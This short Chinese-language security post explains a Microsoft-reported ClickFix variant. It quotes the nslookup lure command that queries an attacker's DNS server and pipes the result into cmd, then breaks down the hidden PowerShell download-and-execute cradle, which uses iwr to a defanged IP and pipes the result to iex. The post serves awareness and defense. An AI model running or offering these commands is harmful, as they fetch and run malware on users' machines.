現在 clickFix 會搭配 nslookup DNS

現在 clickFix 會搭配 nslookup DNS

Microsoft alerts on DNS-based ClickFix variant delivering malware via nslookup

讓你執行的 ↓

cmd /c "nslookup example.com 84.21.189[.]20 | findstr "^Nmexxxxxxxxxxxxxxx | cmd

但它實際是透過 84.21.189[.]20 這裡查 example.com 的 假 DNS 記錄 (不是真正的 example.com 記錄)

一樣是讓你執行 powershell ，然後下載惡意程式執行它

解釋 cname 內容

powershell.exe
呼叫 PowerShell 主程式。

\032
\032 是八進位的 ASCII 32（也就是「空白字元」）。攻擊者常用它來做 obfuscation（混淆）。

-ep bypass（ExecutionPolicy Bypass）
暫時繞過執行原則限制，讓腳本更容易跑（常見於惡意行為）。

-w h（-WindowStyle Hidden）
視窗隱藏執行，讓使用者不容易察覺。

-c "..."（Command）
直接執行後面引號內的指令字串。

iwr http://64.227.40[.]197/o -useb
iwr 是 Invoke-WebRequest 的別名：去指定 URL 下載內容。
-useb 是 -UseBasicParsing（較舊版本用來避免依賴 IE 解析元件；也常被用在惡意下載器）。

| iex
管線把下載回來的文字內容交給 iex（Invoke-Expression）直接當作程式碼執行。
這是典型 「下載並執行（download cradle）」 的惡意樣式。